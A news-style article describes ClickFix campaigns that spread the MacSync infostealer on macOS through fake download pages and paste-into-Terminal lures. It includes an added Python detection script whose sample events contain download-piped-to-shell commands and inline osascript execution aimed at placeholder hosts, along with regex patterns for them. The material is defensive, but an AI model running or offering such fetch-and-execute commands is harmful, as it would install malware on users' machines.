Recent cybersecurity investigations have uncovered three distinct ClickFix campaigns that are being used to disseminate the MacSync infostealer on macOS systems. These campaigns primarily rely on user interaction, such as copying and executing terminal commands, which makes them particularly effective against users who may not understand the risks involved. The campaigns were analyzed by Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey.
Deployment Tactics of ClickFix Campaigns
The origin of these campaigns remains uncertain, and it is unclear if they are orchestrated by the same threat actor. Jamf Threat Labs had previously flagged the use of ClickFix strategies in December 2025. Each campaign employs unique tactics to lure users into running harmful commands on their systems.
In November 2025, a campaign used the OpenAI Atlas browser as bait, directing users through Google search results to a fake Google Sites page. Upon clicking a download button, users were instructed to open the Terminal app and paste a command, which downloaded a shell script that ran MacSync with user-level permissions. December 2025 saw another campaign that targeted users searching for “how to clean up your Mac,” leveraging legitimate OpenAI ChatGPT conversations to redirect victims to malicious landing pages.
Geographic Reach and Evolving Techniques
By February 2026, a newer campaign had emerged, targeting regions such as Belgium, India, and parts of the Americas. This version introduced a MacSync variant that utilized dynamic AppleScript payloads and in-memory execution to evade detection. These developments highlight the adaptability of threat actors in refining ClickFix tactics to bypass security measures.
Additionally, ClickFix campaigns have been observed using well-known hosting platforms such as Cloudflare Pages and Squarespace to serve deceptive installation instructions for tools like Anthropic’s Claude Code. These pages trick users into installing malware such as Amatera Stealer. The method, dubbed InstallFix or GoogleFix, has been noted for its effectiveness against developers accustomed to legitimate command-line installation patterns.
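The chain described above, in which a user pastes a command into Terminal that fetches and runs a shell script and, in later variants, executes AppleScript in memory, leaves a recognisable footprint in process telemetry. The following is an added detection example, not code from Sophos or from the article; the event records are constructed and their field names are an assumption rather than any vendor's schema.

```python
import re

# Constructed process-execution events in the shape of endpoint telemetry.
# Field names are illustrative assumptions, not any vendor's schema.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "process": "bash",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/setup.sh | sh"'},
    {"parent": "Terminal", "process": "osascript",
     "cmdline": "osascript -e 'do shell script \"/bin/sh /tmp/x\"'"},
    {"parent": "Terminal", "process": "git", "cmdline": "git pull"},
    {"parent": "launchd", "process": "curl",
     "cmdline": "curl -s https://updates.example.invalid/check"},
    {"parent": "iTerm2", "process": "zsh",
     "cmdline": 'zsh -c "wget -qO- https://example.invalid/i.sh | bash"'},
]

# ClickFix depends on the victim pasting into an interactive terminal, so the
# parent process is the strongest context signal; everything else is heuristic.
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2"}
# A download utility whose output is piped straight into a shell.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh)\b")
# AppleScript passed inline on the command line rather than from a file on disk.
INLINE_APPLESCRIPT = re.compile(r"\bosascript\b.*\s-e\s")


def clickfix_indicators(event):
    """Return the heuristic hits for one event; an empty list means no match."""
    hits = []
    if event["parent"] not in INTERACTIVE_TERMINALS:
        return hits
    if DOWNLOAD_TO_SHELL.search(event["cmdline"]):
        hits.append("download piped to shell from interactive terminal")
    if INLINE_APPLESCRIPT.search(event["cmdline"]):
        hits.append("inline AppleScript via osascript -e")
    return hits


def find_clickfix_candidates(events):
    """Return (index, hits) for every event that trips at least one heuristic."""
    return [(i, h) for i, e in enumerate(events) if (h := clickfix_indicators(e))]


if __name__ == "__main__":
    for i, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", hits)
```

Developers who routinely install tooling with a piped `curl | sh` will trip the first heuristic, which is exactly the habit InstallFix abuses, so treat these hits as triage candidates to enrich with the download host and the script's behaviour rather than as a standalone verdict.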
Wider Implications and Security Recommendations
ClickFix strategies have been adopted by various threat actors, including groups utilizing a malicious traffic distribution system (TDS) named KongTuke. This system employs compromised WordPress sites and fake CAPTCHA lures to deploy malware like ModeloRAT. Such techniques have also been linked to other attacks involving DNS TXT records and pastejacking tactics designed to install various types of stealer malware.
To mitigate these threats, security experts advise maintaining updated software, using strong passwords, enabling two-factor authentication, and remaining vigilant against phishing tactics. As demonstrated by the diversity and sophistication of ClickFix campaigns, even trusted websites can be compromised, underscoring the importance of a proactive security posture.
Users and site administrators alike should stay informed about the latest methods employed by cybercriminals and adopt robust cybersecurity measures to protect against potential breaches.
